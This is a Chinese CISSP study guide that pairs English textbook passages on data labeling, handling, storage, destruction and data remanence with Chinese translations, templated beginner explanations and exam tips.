NIST:NIST 提供美国常用安全标准、框架和指南。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

分类由数据所有者决定,保护由保管者实施。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
学习单元 15 / PDF P338

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

administrators know where the data is, they can take additional steps to protect it. As an example, a database server may include unencrypted credit card numbers. When the DLP discovers and reports this, database administrators can ensure the numbers are encrypted. As another example, company policy may dictate that employee laptops do not contain any PII data. A DLP content discovery system can search these and discover any unauthorized data. Additionally, many content discovery systems can search cloud resources used by an organization.

Labeling Sensitive Data and Assets Labeling (often called security labeling) sensitive information ensures that users can easily identify the classification level of any data. The most important information that a tag or a label provides is the classification of the data. For example, a label of top secret makes it clear to anyone who sees the label that the information or asset is classified top secret. When users know the value of the data or asset, they are more likely to take appropriate steps to control and protect it based on the classification. Security labeling includes both physical and electronic tags and labels.

Physical labels indicate the security classification for the data stored on assets such as media or processed on a system. For example, if a backup tape includes secret data, a physical label attached to the tape makes it clear to users that it holds secret data. Similarly, if a computer processes sensitive information, the computer would have a label indicating the highest classification of information that it processes. A computer used to process confidential, secret, and top secret data should be marked with a label indicating that it processes top secret data. Physical labels remain on the system or media throughout its lifetime.

Security labeling also includes using digital tags or labels. A simple method is to include the classification as a header or footer in a document or embed it as a watermark. A benefit of these methods is that they also appear on printouts. Even when users include headers and footers on printouts, most organizations require users to place printed sensitive documents within a folder that includes a label or cover page clearly indicating the classification. Headers aren't limited to files. Backup tapes often include header information, and the classification can be included in this header.

Another benefit of headers, footers, and watermarks is that DLP systems can identify documents that include sensitive information and apply the

中文直译 / 整理

管理员知道数据的位置后,他们可以采取额外措施来保护它。 例如,数据库服 务器可能包含未加密的信用卡号码。 当DLP发现并报告此情况时,数据库管 理员可以确保这些号码已被加密。 另一个例子是,公司政策可能规定员工笔记 本电脑不得包含任何PII数据。 DLP内容发现系统可以搜索这些设备并发现任 何未经授权的数据。 此外,许多内容发现系统还可以搜索组织使用的云资源。 标记敏感数据和资产 标记(通常称为安全标记)敏感信息可确保用户轻松识别任何数据的分类级别。 标签或标记提供的最重要信息是数据的分类。 例如,标记为“绝密”可明确告 知任何看到该标签的人,该信息或资产属于绝密级别。 当用户了解数据或资产 的价值时,他们更有可能根据分类采取适当措施对其进行控制和保护。 安全标 记包括物理标签和电子标签。 物理标签用于指示存储在介质等资产上或在系统上处理的数据的安全分类。 例 如,如果备份磁带包含秘密数据,附着在磁带上的物理标签可明确告知用户其 存储的是秘密数据。 类似地,如果计算机处理敏感信息,该计算机应带有标签,标明其处理的信息 的最高分类级别。 用于处理机密、秘密和绝密数据的计算机应标记为表明其处 理绝密数据。

物理标签在整个系统或介质的生命周期内保持不变。 安全标记还包括使用数字标签或标记。 一种简单的方法是在文档中将分类信息 作为页眉或页脚包含,或将其嵌入为水印。 这些方法的好处是,它们也会出现 在打印件上。 即使用户在打印件上添加了页眉和页脚,大多数组织仍要求用户 将打印的敏感文档放入带有标签或封面页的文件夹中,且该标签或封面页必须 明确标明分类。 页眉不仅限于文件。 备份磁带通常包含页眉信息,分类信息也 可以包含在该页眉中。 页眉、页脚和水印的另一个好处是,DLP系统可以识别包含敏感信息的文档并应用

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 16 / PDF P339

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

appropriate security controls. Some DLP systems will also add metadata tags to the document when they detect that the document is classified. These tags provide insight into the document's contents and help the DLP system handle it appropriately. Similarly, some organizations mandate specific desktop backgrounds on their computers. For example, a system used to process proprietary data might have a black desktop background with the word Proprietary in white and a wide orange border. The background could also include statements such as “This computer processes proprietary data” and statements reminding users of their responsibilities to protect the data.

In many secure environments, personnel also use labels for unclassified media and equipment. This prevents an error of omission where sensitive information isn't marked. For example, if a backup tape holding sensitive data isn't marked, a user might assume it only holds unclassified data. However, if the organization marks unclassified data, too, unlabeled media would be easily noticeable, and the user would view an unmarked tape with suspicion. Organizations often identify procedures to downgrade media. For example, if a backup tape includes confidential information, an administrator might want to downgrade the tape to unclassified.

The organization would identify trusted procedures that will purge the tape of all usable data. After administrators purge the tape, they can then downgrade it and replace the labels. However, many organizations prohibit downgrading media at all. For example, a data policy might prohibit downgrading a backup tape that contains top secret data. Instead, the policy might mandate destroying this tape when it reaches the end of its life cycle. Similarly, it is rare to downgrade a system. In other words, if a system has been processing top secret data, it would be rare to downgrade it and relabel it as an unclassified system.

In any event, approved procedures would need to be created to inform personnel what can be downgraded and what should be destroyed.

中文直译 / 整理

相应的安全控制措施。 一些DLP系统在检测到文档被分类时,还会向文档添加 元数据标签。 这些标签有助于了解文档的内容,并帮助DLP系统适当处理它。 同样,一些组织会强制规定其计算机上的特定桌面背景。 例如,用于处理专有 数据的系统可能具有黑色桌面背景,白色文字显示Proprietary,并带有醒目的 橙色边框。 背景中还可能包含诸如“此计算机处理专有数据”之类的声明,以 及提醒用户负有保护数据责任的提示。 在许多安全环境中,人员还会为非密介质和设备使用标签,以防止因遗漏而未 标记敏感信息的情况。 例如,如果存有敏感数据的备份磁带未加标记,用户可 能会误以为它仅包含非密数据。 然而,如果组织也对非密数据进行标记,则未 标记的介质将变得显而易见,用户会以怀疑的态度看待未标记的磁带。 组织通常会制定降低介质密级的流程。 例如,如果备份磁带包含机密信息,管 理员可能希望将其降级为非密级别。 组织会确定可信赖的流程,以彻底清除磁 带上所有可用数据。 管理员清除磁带数据后,即可降低其密级并更换标签。 然而,许多组织完全禁止降低媒体的密级。 例如,数据政策可能禁止降低包含 绝密数据的备份磁带的密级。

相反,该政策可能规定,当磁带达到其生命周期 终点时,必须销毁该磁带。 同样,降低系统密级的情况也很罕见。 换句话说, 如果一个系统曾处理过绝密数据,那么将其降级并重新标记为非密系统是极少 见的。 无论如何,都需要制定经批准的程序,以告知人员哪些内容可以降级, 哪些内容应当销毁。

小白解释

场景先行:你是公司的安全负责人,正在读第 339 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 17 / PDF P340

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

If media or a computing system needs to be downgraded to a less sensitive classification, it must be sanitized using appropriate procedures, as described in the section “Data Destruction,” later in this chapter. However, it's often safer and easier just to purchase new media or equipment rather than follow through with the sanitization steps for reuse. Handling Sensitive Information and Assets Handling refers to the secure transportation of media through its lifetime. Personnel handle data differently based on its value and classification, and as you'd expect, highly classified information needs much greater protection. Even though this is common sense, people still make mistakes.

Many times, people get accustomed to handling sensitive information and become lackadaisical about protecting it. A common occurrence is the loss of control of backup tapes. Backup tapes should be protected with the same level of protection as the data that they contain. In other words, if confidential information is on a backup tape, the backup tape should be protected as a confidential asset. Similarly, data stored in the cloud needs to be protected with the same level of protection with which it is protected on-site. Amazon Web Services (AWS) Simple Storage Service (S3) is a cloud-based object storage service. Data is stored in S3 buckets, which are like folders on Windows systems.

Just as you set permissions on any folder, you set permissions on AWS buckets. Unfortunately, this concept eludes many AWS users. As an example, a bucket owned by THSuite, a cannabis retailer, exposed the PII of more than 30,000 individuals in early 2020. Another example from 2020 involved 900,000 before and after cosmetic surgery images and videos stored in an unsecured bucket. Many of these included clear views of the patients' faces, along with all parts of their bodies. Policies and procedures need to be in place to ensure that people understand how to handle sensitive data. This starts by ensuring that systems and media are labeled appropriately.

Additionally, as President Reagan famously said when discussing relations with the Soviet Union, “Trust, but verify.” Chapter 17, “Preventing and Responding to Incidents,” discusses the importance of

中文直译 / 整理

如果媒体或计算系统需要降级为较低敏感级别的分类,必须按照本章后 面“数据销毁”部分所述的适当程序进行净化。 然而,通常更安全、更简便 的做法是直接购买新的媒体或设备,而不是执行净化步骤以供重复使用。 处理敏感信息和资产 处理是指在介质的整个生命周期中安全地运输它。 人员会根据数据的价值和分 类以不同方式处理数据,正如您所预期的,高度机密的信息需要更强的保护。 尽管这属于常识,但人们仍会犯错。 许多人习惯了处理敏感信息后,便对保护 它变得松懈。 一个常见的问题是备份磁带失去控制。 备份磁带应与其中包含的数据享有同 等的保护级别。 换句话说,如果备份磁带上存有保密信息,则该备份磁带应 作为保密资产加以保护。 同样,存储在云端的数据应与本地存储时享有同等的保护级别。 亚马逊网络服 务(AWS)简单存储服务(S3)是一种基于云的对象存储服务。 数据存储在 S3 存储桶 中,这些存储桶类似于 Windows 系统中的文件夹。 就像为任何文 件夹设置权限一样,您也需要为 AWS 存储桶设置权限。 不幸的是,许多 AWS 用户无法理解这一概念。

例如,2020 年初,大麻零售商 THSuite 拥有的一个存储桶暴露了超过 30,000 名个人的个人信息。 另一个 2020 年的案例涉及存放在未受保护存储桶中的 90 万张整形手术前后图片和视 频,其中许多清晰展示了患者的面部以及身体各个部位。 需要制定政策和程序,以确保人员了解如何处理敏感数据。 这始于确保系统和 介质得到适当标注。 此外,正如里根总统在讨论与苏联的关系时著名的说法: ‘信任,但要核实。 ’第17章,“事件的预防与应对”,讨论了

小白解释

场景先行:你是公司的安全负责人,正在读第 340 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 18 / PDF P341

第 341 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

logging, monitoring, and auditing. These controls verify that sensitive information is handled appropriately before a significant loss occurs. If a loss does occur, investigators use audit trails to help discover what went wrong. Any incidents that occur because personnel didn't handle data appropriately should be quickly investigated and actions taken to prevent a reoccurrence. Data Collection Limitation One of the easiest ways to prevent the loss of data is to simply not collect it. As an example, consider a small e-commerce company that allows customers to make purchases with a credit card. It uses a credit card processor to process credit card payments.

If the company just passes the credit card data to the processor for approval and never stores it on a company server, the company cannot lose the credit card data in a later breach. In contrast, imagine a different e-commerce company sells products online. Every time a customer makes a purchase, the company collects as much information as possible on the customer, such as the name, email address, physical address, phone number, credit card data, and more. It suffers a data breach and all this data is exposed, resulting in significant liabilities for the company. The guideline is clear. If the data doesn't have a clear purpose for use, don't collect it and store it.

This is also why many privacy regulations mention limiting data collection. Data Location Data location refers to the location of data backups or data copies. Imagine a small organization's primary business location is in Norfolk, Virginia. The organization stores all the data on-site. However, they regularly perform backups of the data. A best practice is to keep a backup copy on-site and another backup copy offsite. If a disaster, such as a fire, destroys the primary business location, the organization would still have a backup copy stored off-site. The decision of how far off-site to store the backup needs to be considered.

If it's stored in a business located in the same building, it could be destroyed in the same fire. Even if the backup was stored 5 miles away, it is possible a hurricane or flood could destroy both locations.

中文直译 / 整理

日志记录、监控和审计。 这些控制措施可验证在发生重大损失之前,敏感信息 是否得到适当处理。 如果确实发生损失,调查人员将利用审计跟踪来帮助发现 出了什么问题。 任何因人员未适当处理数据而发生的事件都应迅速调查,并采 取措施防止再次发生。 数据收集限制 防止数据丢失最简单的方法之一就是根本不收集它。 例如,考虑一家小型电子 商务公司,允许客户使用信用卡进行购买。 它使用信用卡处理器来处理信用卡 支付。 如果公司只是将信用卡数据传递给处理器进行批准,而从未将其存储在 公司服务器上,那么即使日后发生数据泄露,公司也不会丢失信用卡数据。 相比之下,想象另一家电子商务公司在线销售产品。 每次客户购买时,公司都 会尽可能收集客户的详细信息,例如姓名、电子邮件地址、物理地址、电话号 码、信用卡数据等。 该公司遭遇了数据泄露,所有这些数据都被曝光,导致公 司承担重大责任。 这一准则非常明确:如果数据没有明确的使用目的,就不要收集和存储它。 这也是许多隐私法规提及限制数据收集的原因。 数据位置 数据位置指的是数据备份或数据副本的位置。 假设一家小型组织的主要业务地 点位于弗吉尼亚州诺福克。 该组织将所有数据存储在本地。

然而,他们定期对 数据进行备份。 最佳实践是保留一份本地备份副本和一份异地备份副本。 如果发生火灾等灾难, 导致主要业务地点被毁,该组织仍保有一份异地存储的备份副本。 需要考虑将备份存储在多远的异地位置。 如果备份存储在同一栋楼内的业务场 所,可能在同一次火灾中被摧毁。 即使备份存储在5英里外,飓风或洪水仍有 可能同时摧毁两个地点。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

指南:指南是建议做法,不一定强制。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 341 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Recommended、not compulsory 常对应 guideline。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
指南 指南是建议做法,不一定强制。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 19 / PDF P342

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Some organizations maintain data in large data centers. It's common to replicate this data to one or more other data centers to maintain the availability of the critical data. These data centers are typically located in separate geographical locations. When using cloud storage for backups, some organizations may need to verify the location of the cloud storage to ensure it is in a separate geographical location. Storing Sensitive Data Sensitive data should be stored in such a way that it is protected against any type of loss. Encryption methods prevent unauthorized entities from accessing the data even if they obtain databases or hardware assets.

If sensitive data is stored on physical media such as portable disk drives or backup tapes, personnel should follow basic physical security practices to prevent losses due to theft. This includes storing these devices in locked safes or vaults, or within a secure room that includes several additional physical security controls. For example, a server room includes physical security measures to prevent unauthorized access, so storing portable media within a locked cabinet in a server room would provide strong protection. Additionally, environmental controls protect the media. This includes temperature and humidity controls such as heating, ventilation, and air conditioning (HVAC) systems.

Here's a point that end users often forget: the value of any sensitive data is much greater than the value of the media holding the sensitive data. In other words, it's cost-effective to purchase high-quality media, especially if the data will be stored for a long time, such as on backup tapes. Similarly, the purchase of high-quality USB flash drives with built-in encryption is worth the cost. Some of these USB flash drives include biometric authentication mechanisms using fingerprints, which provide added protection. Encryption of sensitive data provides an additional layer of protection and should be considered for any data at rest.

If data is encrypted, it becomes much more difficult for an attacker to access it, even if it is stolen. Data Destruction

中文直译 / 整理

一些组织在大型数据中心中保存数据。 通常会将这些数据复制到一个或多个其 他数据中心,以确保关键数据的可用性。 这些数据中心通常位于不同的地理区 域。 当使用云存储进行备份时,一些组织可能需要核实云存储的位置,以确保 其位于不同的地理区域。 存储敏感数据 敏感数据应以防止任何形式丢失的方式存储。 加密方法可防止未经授权的实 体即使获取了数据库或硬件资产也无法访问数据。 如果敏感数据存储在物理介质上,例如便携式磁盘驱动器或备份磁带,人员应 遵循基本的物理安全措施,以防止因盗窃造成的损失。 这包括将这些设备存放 在上锁的保险箱或金库中,或存放在包含多种额外物理安全控制的安全房间内。 例如,服务器机房包含防止未经授权访问的物理安全措施,因此将便携式介质 存放在服务器机房内的上锁柜中可提供强有力的保护。 此外,环境控制措施可保护介质。 这包括温湿度控制,例如供暖、通风 和空调(HVAC)系统。 这里有一个终端用户常常忽略的要点:任何敏感数据的价值都远高于存储该数 据的介质本身的价值。 换句话说,购买高质量的介质是经济高效的,特别是当 数据需要长期存储时,例如在备份磁带上。

同样,购买带有内置加密功能的高 质量USB闪存驱动器也是值得的。 一些此类USB闪存驱动器包含使用指纹的生 物识别认证机制,可提供额外的保护。 对敏感数据进行加密可提供额外的保护层,任何静态数据都应考虑 采用加密措施。 如果数据已加密,即使被窃取,攻击者也难以访问。 数据销毁

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 20 / PDF P343

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

When an organization no longer needs sensitive data, personnel should destroy it. Proper destruction ensures that it cannot fall into the wrong hands and result in unauthorized disclosure. Highly classified data requires different steps to destroy it than data classified at a lower level. An organization's security policy or data policy should define the acceptable methods of destroying data based on the data's classification. For example, an organization may require the complete destruction of media holding highly classified data, but allow personnel to use software tools to overwrite data files classified at a lower level. NIST SP 800-88, Rev.

1—Guides for Media Sanitization provides comprehensive details on different sanitization methods. Sanitization methods (such as clearing, purging, and destroying) help ensure that data cannot be recovered. Proper sanitization steps remove all sensitive data before disposing of a computer. This includes removing or destroying data on nonvolatile memory, internal hard drives, and solid-state drives (SSDs). It also includes removing all CDs/DVDs and Universal Serial Bus (USB) drives. Sanitization can refer to the destruction of media or using a trusted method to purge classified data from the media without destroying it.

Eliminating Data Remanence Data remanence is the data that remains on media after the data was supposedly erased. It typically refers to data on a hard drive as residual magnetic flux or slack space. If media includes any type of private and sensitive data, it is important to eliminate data remanence. Slack space is the unused space within a disk cluster. Operating systems store files on hard disk drives in clusters, which are groups of sectors (the smallest storage unit on a hard disk drive). Sector and cluster sizes vary, but for this example, imagine a cluster size of 4,096 bytes and a file size of 1,024 bytes.

After storing the file, the cluster would have 3,072 bytes of unused space or slack space. Some operating systems fill this slack space with data from memory. If a user was working on a top secret file a moment ago and then creates a small unclassified file, the small file might contain top secret data pulled from memory. This is one of the reasons why personnel should never process classified data on unclassified systems. Using system tools to delete data generally leaves much of the data remaining on the media, and widely available tools can easily undelete it. Even when

中文直译 / 整理

当组织不再需要敏感数据时,人员应将其销毁。 适当的销毁可确保数据不会落 入他人之手而导致未经授权的泄露。 高度机密数据的销毁步骤与较低级别分类 的数据不同。 组织的安全策略或数据策略应根据数据的分类定义可接受的销毁 方法。 例如,组织可能要求彻底销毁存储高度机密数据的介质,但允许人员使 用软件工具覆盖较低级别分类的数据文件。 NIST SP 800‑88,Rev. 1——媒体清理指南提供了有关不同清理方法的详细信 息。 清理方法(如清除、清除和销毁)有助于确保数据无法恢复。 在处置计算 机之前,应采取适当的清理步骤删除所有敏感数据。 这包括删除或销毁非易失 性内存、内部硬盘驱动器和固态驱动器(SSD)上的数据。 还包括删除所有 CD/DVD和通用串行总线(USB)驱动器。 清理可以指销毁媒体,或使用可信方法在不销毁媒体的情况下清除媒体中的机密 数据。 消除数据残留 数据残留是指在数据被声称删除后仍残留在媒体上的数据。 它通常指硬 盘上的残留磁通量或空闲空间。 如果媒体包含任何类型的私人和敏感数 据,则消除数据残留非常重要。 空闲空间是指磁盘簇内未使用的空间。

操作系统将文件存储在硬盘驱动器的簇 中,簇是扇区(硬盘驱动器上最小的存储单元)的集合。 扇区和簇的大小各不 相同,但在此示例中,假设簇大小为4,096字节,文件大小为1,024字节。 在存 储文件后,该簇将剩余3,072字节的未使用空间,即空闲空间。 某些操作系统会使用内存中的数据填充这种空闲空间。 如果用户刚刚还在处理 一个绝密文件,然后创建了一个小的非密文件,这个小文件可能会包含从内存 中提取的绝密数据。 这就是为什么人员绝不能在非密系统上处理密级数据的原 因之一。 使用系统工具删除数据通常会使大部分数据仍保留在介质上,且广泛可用的工具可 以轻松恢复这些数据。 即使

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 21 / PDF P344

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

you use sophisticated tools to overwrite the media, traces of the original data may remain as less perceptible magnetic fields. This is like a ghost image that can remain on some older TV and computer monitors if the same data is displayed for long periods of time. Forensics experts and attackers have tools they can use to retrieve this data even after it has been supposedly overwritten. One way to remove data remanence is with a degausser. A degausser generates a heavy magnetic field, which realigns the magnetic fields in magnetic media such as traditional hard drives, magnetic tape, and floppy disk drives.

Degaussers using power will reliably rewrite these magnetic fields and remove data remanence. However, they are only effective on magnetic media. In contrast, SSDs use integrated circuitry instead of magnetic flux on spinning platters. Because of this, degaussing SSDs won't remove data. However, even when using other methods to remove data from SSDs, data remnants often remain. Some SSDs include built-in erase commands to sanitize the entire disk, but unfortunately, these weren't effective on some SSDs from different manufacturers. Due to these risks, the best method of sanitizing SSDs is destruction. The U.S.

